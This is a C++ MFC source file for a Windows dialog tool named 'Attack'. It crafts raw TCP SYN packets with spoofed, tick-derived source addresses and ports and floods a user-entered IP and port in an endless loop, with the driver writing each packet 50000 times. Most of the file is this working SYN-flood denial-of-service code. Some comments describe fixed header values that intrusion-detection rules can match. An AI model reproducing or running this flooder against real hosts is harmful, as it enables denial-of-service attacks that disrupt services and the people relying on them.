// AttackDlg.cpp : 实现文件
//
#include "stdafx.h"
#include "Attack.h"
#include "AttackDlg.h"
#include <winsock2.h>
#include <ws2tcpip.h>
#include <pcap.h>
#include <remote-ext.h>
#include <ntddndis.h>
#include <packet32.h>
#include <iphlpapi.h>
#pragma comment(lib,"Iphlpapi.lib")
#pragma comment(lib,"WS2_32.LIB")
#pragma comment(lib,"Packet.LIB")
#pragma comment(lib,"wpcap.LIB")
#ifdef _DEBUG
#define new DEBUG_NEW
#endif
// CAboutDlg: the dialog shown for the application's "About" menu item.
class CAboutDlg : public CDialog
{
public:
    CAboutDlg();

    // Dialog data: resource ID of the dialog template.
    enum { IDD = IDD_ABOUTBOX };

protected:
    // DDX/DDV support.
    virtual void DoDataExchange(CDataExchange* pDX);

    // Implementation: message map declared through the MFC macro.
    DECLARE_MESSAGE_MAP()
};
// Constructs the About dialog by handing its template ID to the CDialog base.
CAboutDlg::CAboutDlg()
    : CDialog(CAboutDlg::IDD)
{
    // Nothing else to initialize.
}
// Data exchange for the About dialog. It has no bound members, so the call is
// forwarded unchanged to the CDialog base class.
void CAboutDlg::DoDataExchange(CDataExchange* pDX)
{
CDialog::DoDataExchange(pDX);
}
// Message map for CAboutDlg: no entries of its own; everything falls through
// to CDialog.
BEGIN_MESSAGE_MAP(CAboutDlg, CDialog)
END_MESSAGE_MAP()
// CAttackDlg dialog
//
// Constructs the main dialog. The two members that DoDataExchange binds to the
// edit controls start with fixed defaults: the address string "10.60.57.105"
// and port 80.
CAttackDlg::CAttackDlg(CWnd* pParent /*=NULL*/)
    : CDialog(CAttackDlg::IDD, pParent),
      m_IpAddress(_T("10.60.57.105")),
      m_Port(80)
{
    // Load the application icon once; OnInitDialog and OnPaint reuse the handle.
    CWinApp* pApp = AfxGetApp();
    m_hIcon = pApp->LoadIcon(IDR_MAINFRAME);
}
// Data exchange between the dialog controls and the member variables:
// IDC_EDIT1 <-> m_IpAddress and IDC_EDIT2 <-> m_Port.
// Only DDX_Text is used; no DDV_* range or length validation is applied to
// either value here.
void CAttackDlg::DoDataExchange(CDataExchange* pDX)
{
CDialog::DoDataExchange(pDX);
DDX_Text(pDX, IDC_EDIT1, m_IpAddress);
DDX_Text(pDX, IDC_EDIT2, m_Port);
}
// Message map for CAttackDlg: system-command, paint and drag-icon messages,
// plus the click notification of IDC_BUTTON1, which is routed to
// OnBnClickedButton1.
BEGIN_MESSAGE_MAP(CAttackDlg, CDialog)
ON_WM_SYSCOMMAND()
ON_WM_PAINT()
ON_WM_QUERYDRAGICON()
//}}AFX_MSG_MAP
ON_BN_CLICKED(IDC_BUTTON1, &CAttackDlg::OnBnClickedButton1)
END_MESSAGE_MAP()
// CAttackDlg message handlers

// Finishes dialog setup: adds the "About..." entry to the system menu and
// installs the dialog's large and small icons.
// Returns TRUE so that the framework sets the default input focus.
BOOL CAttackDlg::OnInitDialog()
{
    CDialog::OnInitDialog();

    // IDM_ABOUTBOX must be in the system-command range.
    ASSERT((IDM_ABOUTBOX & 0xFFF0) == IDM_ABOUTBOX);
    ASSERT(IDM_ABOUTBOX < 0xF000);

    // Add the "About..." item to the system menu when a label is available.
    CMenu* const sysMenu = GetSystemMenu(FALSE);
    if (sysMenu != NULL)
    {
        CString aboutLabel;
        aboutLabel.LoadString(IDS_ABOUTBOX);
        const bool haveLabel = !aboutLabel.IsEmpty();
        if (haveLabel)
        {
            sysMenu->AppendMenu(MF_SEPARATOR);
            sysMenu->AppendMenu(MF_STRING, IDM_ABOUTBOX, aboutLabel);
        }
    }

    // Set the icon for this dialog. The framework does this automatically only
    // when the application's main window is not a dialog.
    SetIcon(m_hIcon, TRUE);   // large icon
    SetIcon(m_hIcon, FALSE);  // small icon

    // TODO: add extra initialization code here

    // Return TRUE unless the focus was set to a control.
    return TRUE;
}
// System-command handler: shows the About dialog for IDM_ABOUTBOX and passes
// every other command to the CDialog base class.
void CAttackDlg::OnSysCommand(UINT nID, LPARAM lParam)
{
    // The low four bits of nID are masked off before the comparison.
    const bool isAboutCommand = ((nID & 0xFFF0) == IDM_ABOUTBOX);
    if (!isAboutCommand)
    {
        CDialog::OnSysCommand(nID, lParam);
        return;
    }

    CAboutDlg aboutBox;
    aboutBox.DoModal();
}
// This code is needed to draw the icon if a minimize button is added to the
// dialog. For MFC applications that use the document/view model the framework
// does this automatically.
void CAttackDlg::OnPaint()
{
    // Not minimized: default painting is enough.
    if (!IsIconic())
    {
        CDialog::OnPaint();
        return;
    }

    CPaintDC dc(this); // device context used for painting
    SendMessage(WM_ICONERASEBKGND, reinterpret_cast<WPARAM>(dc.GetSafeHdc()), 0);

    // Center the icon inside the client rectangle.
    CRect clientRect;
    GetClientRect(&clientRect);
    const int iconWidth = GetSystemMetrics(SM_CXICON);
    const int iconHeight = GetSystemMetrics(SM_CYICON);
    const int left = (clientRect.Width() - iconWidth + 1) / 2;
    const int top = (clientRect.Height() - iconHeight + 1) / 2;

    // Draw the icon.
    dc.DrawIcon(left, top, m_hIcon);
}
// Called by the system to obtain the cursor to display while the user drags
// the minimized window. The dialog icon handle is returned as that cursor.
HCURSOR CAttackDlg::OnQueryDragIcon()
{
    HCURSOR dragCursor = static_cast<HCURSOR>(m_hIcon);
    return dragCursor;
}
// Ethernet frame header. Attack() copies it to the start of the send buffer.
typedef struct ethdr
{
unsigned char eh_dst[6]; // Ethernet destination address
unsigned char eh_src[6]; // Ethernet source address
unsigned short eh_type; // frame type; Attack() stores htons(0x0800) here
}ETHEADER;
// IPv4 header without options. Multi-byte fields are expected in network
// byte order; the struct is copied byte-for-byte into the outgoing frame.
typedef struct tag_ip_Header // IP header
{
unsigned char h_verlen; // 4-bit IP version (high bits) and 4-bit header length (low bits)
unsigned char tos; // 8-bit type of service
unsigned short total_len; // 16-bit total length
unsigned short ident; // 16-bit identification
unsigned short frag_and_flags; // 3-bit flags (the remaining bits of the field are the fragment offset)
unsigned char ttl; // 8-bit time to live
unsigned char proto; // 8-bit protocol
unsigned short checksum; // IP header checksum
unsigned int SourceIP; // spoofed source IP address
unsigned int DestIP; // IP address of the target
}IPHEADER;
// TCP header without options. Multi-byte fields are expected in network byte
// order; the struct is copied byte-for-byte into the outgoing frame.
typedef struct tag_tcp_Header
{
USHORT th_sport; // spoofed source port
USHORT th_dport; // target port
unsigned int th_seq; // 32-bit sequence number
unsigned int th_ack; // 32-bit acknowledgement number
unsigned char th_lenres; // 4-bit header length (high bits) followed by reserved bits
unsigned char th_flag; // 6 flag bits
USHORT th_win; // 16-bit window size
USHORT th_sum; // 16-bit checksum
USHORT th_urp; // 16-bit urgent pointer
}TCPHEADER;
// TCP pseudo-header. Attack() places it in front of the TCP header only while
// computing the TCP checksum; it is not part of the transmitted frame.
typedef struct tag_tsd_Header
{
unsigned long saddr; // spoofed source address
unsigned long daddr; // target address
char mbz; // Attack() sets this byte to 0
char ptcl; // protocol type
unsigned short tcpl; // TCP length
}TSDHEADER;
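// Computes the 16-bit one's-complement checksum used by the IP and TCP
// headers.
//
// buffer - start of the data; it is read as 16-bit words in host byte order.
// size   - number of bytes to sum. Values <= 0 yield the checksum of no data.
//
// Returns the complemented, folded sum. Because the words are read as stored,
// the result can be written straight into a header that is already in network
// byte order.
USHORT checksum(USHORT *buffer,int size)
{
    unsigned long sum = 0;

    // Sum all complete 16-bit words.
    while (size > 1)
    {
        sum += *buffer++;
        size -= sizeof(USHORT);
    }

    // Odd length: add only the single byte that is left. Reading a whole
    // USHORT here would touch one byte beyond the end of the caller's data.
    if (size > 0)
    {
        sum += *reinterpret_cast<const unsigned char *>(buffer);
    }

    // Fold the carries back into the low 16 bits, then complement.
    sum = (sum >> 16) + (sum & 0xffff);
    sum += (sum >> 16);
    return (USHORT)(~sum);
}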
// Builds an Ethernet + IPv4 + TCP frame with only the SYN flag set, addressed
// to ip:port, and transmits it in an endless loop through a Packet.dll
// (packet32.h) adapter handle. The source IP address, source port and TTL of
// each frame are derived from GetTickCount().
//
// ip   - destination address string, parsed with inet_addr().
// port - destination TCP port, converted with htons().
//
// Header values that are identical in every frame built here, which is what a
// capture filter or IDS rule can match on: tos 0, ident assigned as 256
// without htons(), fragment field 0, TCP sequence htonl(0x1234567),
// acknowledgement 0, window 0, urgent pointer 0, flag byte 2, data offset of
// sizeof(tcpHeader)/4 words (no options) and no payload. The source port is
// always below 8310 because of the % 8310.
//
// The while(true) loop has no exit, so this function does not return and the
// two cleanup calls after the loop are never reached.
void Attack(char* ip,int port)
{
ETHEADER etHeader;
IPHEADER ipHeader;
TCPHEADER tcpHeader;
TSDHEADER psdHeader;
unsigned char SendBuff[2000];
pcap_if_t *alldevs;
char errbuf[PCAP_ERRBUF_SIZE];
// Enumerate capture devices; the return value is not checked.
pcap_findalldevs(&alldevs,errbuf);
//pcap_if_t *d;
//pcap_t* fp;
//pcap_freealldevs(alldevs);
//for(d=alldevs;d;d=d->next);
//alldevs->addresses->dstaddr->sa_data;
//fp=pcap_open(alldevs->next->next->name,60,PCAP_OPENFLAG_PROMISCUOUS,1000,NULL,NULL);
WCHAR adaptername[8192];
ULONG adapterlength;
LPADAPTER lpAdapter=0;
adapterlength=sizeof(adaptername);
// The adapter-name list is fetched but not used below (its only use is commented out).
PacketGetAdapterNames(adaptername,&adapterlength);
//lpAdapter=PacketOpenAdapter((char*)adaptername);
// Opens the third entry of the device list; the list is not checked for length.
lpAdapter=PacketOpenAdapter(alldevs->next->next->name); //// the adapter has to be located for this argument
LPPACKET pPacket;
// Get the local machine's IP address
PHOSTENT hostinfo;
WORD v;
WSADATA wd;
char* localip=new char[16];
char hostname[100];
v=MAKEWORD(2,0);
if(WSAStartup(v,&wd)==0)
{
if( gethostname(hostname,100)==0)
{
hostinfo=gethostbyname(hostname);
// localip is re-pointed at the string returned by inet_ntoa(); the 16 bytes
// allocated above are not released anywhere in this function.
localip=inet_ntoa(*(struct in_addr*)*hostinfo->h_addr_list);
}
}
long len = 6;
ULONG srcMac[2];
ULONG destMac[2];
// Resolve the local IP to a MAC address; it becomes the Ethernet source address.
SendARP(inet_addr(localip), NULL, srcMac, (PULONG)&len);
PBYTE pbHexsrcMac = (PBYTE)srcMac;
////////////////////////////////////////
// Get the gateway IP address using GetAdaptersInfo();
char* gateway;
PIP_ADAPTER_INFO pAdapterInfo;
PIP_ADAPTER_INFO pAdapter = NULL;
DWORD dwRetVal = 0;
pAdapterInfo = (IP_ADAPTER_INFO *) malloc( sizeof(IP_ADAPTER_INFO) );
ULONG ulOutBufLen = sizeof(IP_ADAPTER_INFO);
// First call only learns the required buffer size when one entry is too small.
if (GetAdaptersInfo( pAdapterInfo, &ulOutBufLen) == ERROR_BUFFER_OVERFLOW)
{
free(pAdapterInfo);
pAdapterInfo = (IP_ADAPTER_INFO *) malloc (ulOutBufLen);
}
if ((dwRetVal = GetAdaptersInfo( pAdapterInfo, &ulOutBufLen)) == NO_ERROR)
{
pAdapter = pAdapterInfo;
//localip=pAdapter->IpAddressList.IpAddress.String; // could obtain the local IP address;
// Takes the gateway of the second adapter in the list.
gateway=pAdapter->Next->GatewayList.IpAddress.String; // the right adapter has to be located
}
// NOTE(review): gateway is only assigned inside the branch above; it is read
// here regardless of whether that branch ran.
// Resolve the gateway IP to a MAC address; it becomes the Ethernet destination.
SendARP(inet_addr(gateway),NULL, destMac, (PULONG)&len);
PBYTE pbHexdestMac = (PBYTE)destMac;
etHeader.eh_dst[0]=pbHexdestMac[0];
etHeader.eh_dst[1]=pbHexdestMac[1];
etHeader.eh_dst[2]=pbHexdestMac[2];
etHeader.eh_dst[3]=pbHexdestMac[3];
etHeader.eh_dst[4]=pbHexdestMac[4];
etHeader.eh_dst[5]=pbHexdestMac[5];
etHeader.eh_src[0]=pbHexsrcMac[0];
etHeader.eh_src[1]=pbHexsrcMac[1];
etHeader.eh_src[2]=pbHexsrcMac[2];
etHeader.eh_src[3]=pbHexsrcMac[3];
etHeader.eh_src[4]=pbHexsrcMac[4];
etHeader.eh_src[5]=pbHexsrcMac[5];
etHeader.eh_type=htons(0x0800);
// Packet setup
// Fill in the IP header
ipHeader.h_verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long)); // version + header length
ipHeader.tos=0; // type of service
ipHeader.total_len=htons(sizeof(ipHeader)+sizeof(tcpHeader)); // total length
ipHeader.ident=256; // identification
ipHeader.frag_and_flags=0;
ipHeader.proto=IPPROTO_TCP; // protocol type
ipHeader.checksum=0; // 16-bit header checksum
ipHeader.DestIP=inet_addr(ip); // destination address
// Fill in the TCP header
tcpHeader.th_dport=htons(port); // destination port
tcpHeader.th_seq=htonl(0x1234567); // sequence number
tcpHeader.th_ack=0; // acknowledgement number
tcpHeader.th_lenres=(sizeof(tcpHeader)/4<<4|0);// header length
tcpHeader.th_flag=2; // SYN flag (000010)
tcpHeader.th_win=0; // window size
tcpHeader.th_urp=0; // urgent pointer
tcpHeader.th_sum=0; // checksum
// Fill in the pseudo-header
psdHeader.daddr=ipHeader.DestIP;
psdHeader.mbz=0;
psdHeader.ptcl=IPPROTO_TCP;
psdHeader.tcpl=htons(sizeof(tcpHeader));
while(true)
{
// Per-packet values
// The (unsigned char) cast applies to GetTickCount() before the % and +, and
// the result is truncated to 8 bits when stored in ttl.
ipHeader.ttl=(unsigned char)GetTickCount()%8310+620; // tick-derived TTL value
ipHeader.SourceIP=htonl(GetTickCount()*1983); // spoofed, tick-derived source address
int SourcePort =GetTickCount()*1983%8310; // spoofed, tick-derived source port
tcpHeader.th_sport=htons(SourcePort); // source port
psdHeader.saddr=ipHeader.SourceIP;
// Compute the IP checksum over the header copy placed in SendBuff
memcpy(SendBuff,&ipHeader,sizeof(ipHeader));
ipHeader.checksum=checksum((USHORT *)SendBuff,sizeof(ipHeader));
// Compute the TCP checksum over pseudo-header + TCP header
memcpy(SendBuff, &psdHeader, sizeof(psdHeader));
memcpy(SendBuff+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader));
tcpHeader.th_sum=checksum((USHORT *)SendBuff,sizeof(psdHeader)+sizeof(tcpHeader));
// Assemble the frame: Ethernet header, IP header, TCP header
memcpy(SendBuff,&etHeader,sizeof(etHeader));
memcpy(SendBuff+sizeof(etHeader), &ipHeader, sizeof(ipHeader));
memcpy(SendBuff+sizeof(etHeader)+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader));
// Send the frame
// A packet object is allocated on every iteration; the only
// PacketFreePacket() call is after the loop.
pPacket = PacketAllocatePacket();
PacketInitPacket(pPacket,SendBuff,sizeof(ipHeader)+sizeof(tcpHeader)+sizeof(etHeader));
// Ask the driver to write each submitted packet 50000 times, then submit it.
if(PacketSetNumWrites(lpAdapter,50000))
{
PacketSendPacket(lpAdapter,pPacket,TRUE);
}
//pcap_sendpacket(fp,SendBuff,sizeof(ipHeader)+sizeof(tcpHeader)+sizeof(etHeader)+1000); // 7000 packets/s
}
// Not reached: the loop above has no exit.
PacketFreePacket(pPacket);
PacketCloseAdapter(lpAdapter);
}
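// Click handler for IDC_BUTTON1: reads the address and port from the edit
// controls, converts the address to a NUL-terminated char buffer and passes
// both to Attack().
//
// Attack() contains a while(true) loop with no exit, so this handler runs on
// the dialog's message thread and does not return once Attack() is entered.
void CAttackDlg::OnBnClickedButton1()
{
    // Transfer the control contents into m_IpAddress / m_Port. Stop here if
    // the exchange fails (for example, non-numeric text in the port field)
    // instead of continuing with stale values.
    if (!UpdateData(TRUE))
    {
        return;
    }

    // Copy the address one character at a time; each character is narrowed
    // to char on assignment.
    const int length = m_IpAddress.GetLength();
    char* ip = new char[length + 1];
    for (int i = 0; i < length; i++)
    {
        ip[i] = m_IpAddress.GetAt(i);
    }
    ip[length] = '\0';

    Attack(ip, m_Port);

    // The buffer came from new[], so it has to be released with delete[].
    delete[] ip;
}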